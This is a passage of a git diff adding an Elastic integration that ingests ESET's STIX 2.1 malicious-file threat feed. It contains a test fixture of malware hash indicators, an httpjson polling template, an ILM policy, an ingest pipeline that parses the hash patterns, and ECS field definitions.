], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--dafe4edd-2e79-4c62-8512-c39e6c1e2bcb\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of a variant of Win32/AutoRun.Agent.UD worm is present.\", \"pattern\": \"[file:hashes.'SHA-256'='009628403d1f5ea6d5e0c47e0b6481013c2b6ea7caf65e599904f3212b2611a5'] OR [file:hashes.'SHA-1'='0721deb7d7afb22a38be8c68db4d9bebc1d075b8'] OR [file:hashes.'MD5'='1a57c6496aef72a6996d412db68992e7']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of a variant of Win32/AutoRun.Agent.UD worm is present.", + "file": { + "hash": { + "md5": "1a57c6496aef72a6996d412db68992e7", + "sha1": "0721deb7d7afb22a38be8c68db4d9bebc1d075b8", + "sha256": "009628403d1f5ea6d5e0c47e0b6481013c2b6ea7caf65e599904f3212b2611a5" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--8be4c888-fbdd-4869-9d9c-e542a5d8399d", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--8be4c888-fbdd-4869-9d9c-e542a5d8399d\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of a variant of Win32/TrojanDropper.Agent.PQT trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='1058ee33ef745284039b31ac92c3a73e7eed4f8e6bd29e0d64a7ebdfd2231321'] OR [file:hashes.'SHA-1'='08af85f31499678205bf70280fafc421ea16c9e2'] OR [file:hashes.'MD5'='c31852836acbbec2101824999b482de3']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of a variant of Win32/TrojanDropper.Agent.PQT trojan is present.", + "file": { + "hash": { + "md5": "c31852836acbbec2101824999b482de3", + "sha1": "08af85f31499678205bf70280fafc421ea16c9e2", + "sha256": "1058ee33ef745284039b31ac92c3a73e7eed4f8e6bd29e0d64a7ebdfd2231321" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--3e578440-30e0-4b0f-ad66-53a282f7738f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--3e578440-30e0-4b0f-ad66-53a282f7738f\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of VBS/Agent.QMG trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='73c6acbf14cd7e70dd16a6a50baae785bf9cdc8c2a789be2cf16835c746dc9ce'] OR [file:hashes.'SHA-1'='0e75962a268970913d37598d526dc8470a5a7b66'] OR [file:hashes.'MD5'='dbb31d7036f2619928a1268a7ccc6a80']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of VBS/Agent.QMG trojan is present.", + "file": { + "hash": { + "md5": "dbb31d7036f2619928a1268a7ccc6a80", + "sha1": "0e75962a268970913d37598d526dc8470a5a7b66", + "sha256": "73c6acbf14cd7e70dd16a6a50baae785bf9cdc8c2a789be2cf16835c746dc9ce" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--ca3219e3-9e83-4236-b96e-a97c1878ea4f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--ca3219e3-9e83-4236-b96e-a97c1878ea4f\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of HTML/Fraud.CX trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='2bb279b89bef3adbef32fac40a50f3d7d26e1afb24ff1d803b186af9a4bb5425'] OR [file:hashes.'SHA-1'='237b4cd335ff7350e3df23ff42b2e1a2607d463d'] OR [file:hashes.'MD5'='99a95a2f3a5dffe722b1c7e5088337b6']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of HTML/Fraud.CX trojan is present.", + "file": { + "hash": { + "md5": "99a95a2f3a5dffe722b1c7e5088337b6", + "sha1": "237b4cd335ff7350e3df23ff42b2e1a2607d463d", + "sha256": "2bb279b89bef3adbef32fac40a50f3d7d26e1afb24ff1d803b186af9a4bb5425" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--e49799ce-208c-4fab-967d-3eb2c3e71b1b", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--e49799ce-208c-4fab-967d-3eb2c3e71b1b\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of a variant of Win32/GenKryptik.GOVN trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='c84aa7aad50629e8292a023270928903eb002b0673d854354df38ed8a85ae029'] OR [file:hashes.'SHA-1'='35813c9a4e49b3d9dd1740c0b6dc4dde1f97c8dd'] OR [file:hashes.'MD5'='d7244c4828f5189d018108741b0e5ae4']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of a variant of Win32/GenKryptik.GOVN trojan is present.", + "file": { + "hash": { + "md5": "d7244c4828f5189d018108741b0e5ae4", + "sha1": "35813c9a4e49b3d9dd1740c0b6dc4dde1f97c8dd", + "sha256": "c84aa7aad50629e8292a023270928903eb002b0673d854354df38ed8a85ae029" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--9babb86e-0e2f-442c-9b37-5cd05198f58f", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--9babb86e-0e2f-442c-9b37-5cd05198f58f\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of NSIS/Injector.ASH trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='1a3fcc316f4b8b404415a1e22f414431144fe6798374cc860a40eddceae9c31d'] OR [file:hashes.'SHA-1'='489bd8f3ea436f212ad8894041e458737894c830'] OR [file:hashes.'MD5'='35a8d09f90bf40a9efc1c374411bec49']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of NSIS/Injector.ASH trojan is present.", + "file": { + "hash": { + "md5": "35a8d09f90bf40a9efc1c374411bec49", + "sha1": "489bd8f3ea436f212ad8894041e458737894c830", + "sha256": "1a3fcc316f4b8b404415a1e22f414431144fe6798374cc860a40eddceae9c31d" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--1fb40180-521f-470f-95bb-b449282bd636", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--1fb40180-521f-470f-95bb-b449282bd636\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of JS/Kryptik.BMZ trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='b3a0353cdc10e06931a302c9a04ed58cc37b13c438ab7de1b37ea650b63e874b'] OR [file:hashes.'SHA-1'='6a42a72596ff639912e6f130926b9fe7d3d95647'] OR [file:hashes.'MD5'='2554bb1d8059a68cf7a42e5fec72a0de']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of JS/Kryptik.BMZ trojan is present.", + "file": { + "hash": { + "md5": "2554bb1d8059a68cf7a42e5fec72a0de", + "sha1": "6a42a72596ff639912e6f130926b9fe7d3d95647", + "sha256": "b3a0353cdc10e06931a302c9a04ed58cc37b13c438ab7de1b37ea650b63e874b" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--78b8e233-0cab-4d54-8474-7af5f271b96c", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--78b8e233-0cab-4d54-8474-7af5f271b96c\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of JS/ScrInject.B trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='f772194ec4bc9baf384bbee2e483e09ba2f4b9d3b2fbba2978b667c0447bb4c2'] OR [file:hashes.'SHA-1'='74dc6715edd2fcfd12f28359f3efca038e9300ac'] OR [file:hashes.'MD5'='46f845c419d4ed6c899bde1b3a16c344']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of JS/ScrInject.B trojan is present.", + "file": { + "hash": { + "md5": "46f845c419d4ed6c899bde1b3a16c344", + "sha1": "74dc6715edd2fcfd12f28359f3efca038e9300ac", + "sha256": "f772194ec4bc9baf384bbee2e483e09ba2f4b9d3b2fbba2978b667c0447bb4c2" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--abab1f5a-69bb-4703-baaf-1579f0717d5a", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--abab1f5a-69bb-4703-baaf-1579f0717d5a\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of HTML/Refresh.AUD trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='a3ac8a9425b52564fddf4309d2ae597a48b70df5deed2b08bd1cf92bdbe6aba3'] OR [file:hashes.'SHA-1'='8a4489c702681aab936aa931b6df312c2720c119'] OR [file:hashes.'MD5'='9bd51aabb0b341a7d072794394e09f86']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of HTML/Refresh.AUD trojan is present.", + "file": { + "hash": { + "md5": "9bd51aabb0b341a7d072794394e09f86", + "sha1": "8a4489c702681aab936aa931b6df312c2720c119", + "sha256": "a3ac8a9425b52564fddf4309d2ae597a48b70df5deed2b08bd1cf92bdbe6aba3" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + }, + { + "@timestamp": "2023-10-15T01:59:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--9baf483f-9dd8-464b-ab81-22e729547c59", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T01:59:23.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--9baf483f-9dd8-464b-ab81-22e729547c59\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T01:59:23.000Z\", \"modified\": \"2023-10-15T01:59:23.000Z\", \"name\": \"b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7\", \"description\": \"Each of these file hashes indicates that a variant of HTML/Phishing.Agent.AUW trojan is present.\", \"pattern\": \"[file:hashes.'SHA-256'='c75b7ec26ef3d6ce1578e0c80ecf124285c0714da0023813bc45f6141f4c5fb5'] OR [file:hashes.'SHA-1'='aacb3c991ce8b1fcc92b353fb82a71cb45487e5e'] OR [file:hashes.'MD5'='73631f9ce0efc3e9ac1d296fcc5af3aa']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T01:59:23Z\", \"valid_until\": \"2023-10-17T01:59:23Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Malicious Files stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Each of these file hashes indicates that a variant of HTML/Phishing.Agent.AUW trojan is present.", + "file": { + "hash": { + "md5": "73631f9ce0efc3e9ac1d296fcc5af3aa", + "sha1": "aacb3c991ce8b1fcc92b353fb82a71cb45487e5e", + "sha256": "c75b7ec26ef3d6ce1578e0c80ecf124285c0714da0023813bc45f6141f4c5fb5" + } + }, + "last_seen": "2023-10-15T01:59:23.000Z", + "modified_at": "2023-10-15T01:59:23.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "provider": "eset", + "type": "file" + } + } + } + ] +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/files/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/files/_dev/test/system/test-httpjson-config.yml new file mode 100644 index 00000000000..a03c8b365a9 --- /dev/null +++ b/packages/ti_eset/data_stream/files/_dev/test/system/test-httpjson-config.yml @@ -0,0 +1,13 @@ +input: httpjson +service: eti +vars: + username: test + password: test +data_stream: + vars: + preserve_original_event: true + url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/ee6a153ed77e4ec3ab21e76cc2074b9f/objects/ + interval: 30s + enable_request_tracer: true +assert: + hit_count: 2 diff --git a/packages/ti_eset/data_stream/files/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/files/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..41117cedade --- /dev/null +++ b/packages/ti_eset/data_stream/files/agent/stream/httpjson.yml.hbs @@ -0,0 +1,72 @@ +config_version: "2" + +interval: {{interval}} +request.method: "GET" +{{#if enable_request_tracer}} +request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +{{/if}} + +auth.basic.user: {{username}} +auth.basic.password: {{password}} + +{{#if url}} +request.url: {{url}} +{{/if}} +{{#if ssl}} +request.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} +{{#if proxy_url}} +request.proxy_url: {{proxy_url}} +{{/if}} + +request.transforms: + - set: + target: header.Content-Type + value: application/taxii+json;version=2.1 + - set: + target: header.Accept + value: application/taxii+json;version=2.1 + - set: + target: url.params.match[type] + value: indicator + - set: + target: url.params.limit + value: {{page_size}} + - set: + target: url.params.added_after + value: '[[ .cursor.timestamp ]]' + default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]' + +response.pagination: + - set: + target: url.params.added_after + value: >- + [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]] + fail_on_template_error: true + +response.split: + target: body.objects + +cursor: + timestamp: + value: >- + [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]] + ignore_empty_value: true + +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/ti_eset/data_stream/files/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/files/elasticsearch/ilm/default_policy.json new file mode 100644 index 00000000000..459c9fffc4e --- /dev/null +++ b/packages/ti_eset/data_stream/files/elasticsearch/ilm/default_policy.json @@ -0,0 +1,23 @@ +{ + "policy": { + "phases": { + "delete": { + "actions": { + "delete": {} + }, + "min_age": "7d" + }, + "hot": { + "actions": { + "rollover": { + "max_age": "2d", + "max_size": "50gb" + }, + "set_priority": { + "priority": 100 + } + } + } + } + } +} \ No newline at end of file diff --git a/packages/ti_eset/data_stream/files/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/files/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..d9a64f4d2b4 --- /dev/null +++ b/packages/ti_eset/data_stream/files/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,149 @@ +--- +description: Pipeline for processing malicious files collection feed +processors: + - set: + field: ecs.version + value: '8.11.0' + - set: + field: event.kind + value: enrichment + - append: + field: event.category + value: threat + allow_duplicates: false + - append: + field: event.type + value: indicator + allow_duplicates: false + - set: + field: threat.indicator.provider + value: eset + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + target_field: eti + - drop: + if: ctx.eti?.type != 'indicator' + - set: + field: threat.feed.name + value: "ESET Malicious Files stix 2.1" + - date: + field: eti.created + target_field: "@timestamp" + formats: + - "ISO8601" + if: "ctx.eti?.created != null" + - date: + field: eti.modified + target_field: threat.indicator.last_seen + formats: + - "ISO8601" + if: "ctx.eti?.modified != null" + - set: + field: threat.indicator.modified_at + copy_from: threat.indicator.last_seen + if: "ctx.threat?.indicator?.last_seen != null" + - date: + field: eti.valid_until + target_field: eset.valid_until + formats: + - "ISO8601" + if: "ctx.eti?.valid_until != null" + - rename: + field: eti.id + target_field: eset.id + ignore_missing: true + - rename: + field: eti.description + target_field: threat.indicator.description + ignore_missing: true + - foreach: + field: eti.labels + processor: + append: + field: eset.labels + value: "{{_ingest._value}}" + ignore_missing: true + ignore_failure: true + if: ctx.eti?.labels != null + - script: + lang: painless + params: + "malicious-activity": 'High' + "phishing-activity": 'High' + "unwanted-activity": 'Medium' + "benign": 'Low' + if: ctx.eset?.labels != null + source: > + for (def label : ctx.eset.labels) { + if (params.containsKey(label)) { + ctx.threat.indicator.confidence = params.get(label); + break; + } + } + - split: + field: eti.pattern + target_field: eti._patterns + separator: ' OR ' + ignore_missing: true + - foreach: + field: eti._patterns + processor: + grok: + field: _ingest._value + patterns: + - "^\\[?file:hashes.'MD5'%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.md5}'\\]?" + - "^\\[?file:hashes.'SHA-1'%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha1}'\\]?" + - "^\\[?file:hashes.'SHA-256'%{SPACE}=%{SPACE}'%{DATA:threat.indicator.file.hash.sha256}'\\]?" + ignore_failure: true + - set: + field: threat.indicator.type + value: file + - set: + field: threat.indicator.name + copy_from: eti.name + if: "ctx.eti?.name != null" + - remove: + field: + - eti + ignore_missing: true + - remove: + field: event.original + if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + ignore_failure: true + ignore_missing: true + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - set: + field: error.message + value: '{{ _ingest.on_failure_message }}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/ti_eset/data_stream/files/fields/agent.yml b/packages/ti_eset/data_stream/files/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/data_stream/files/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + 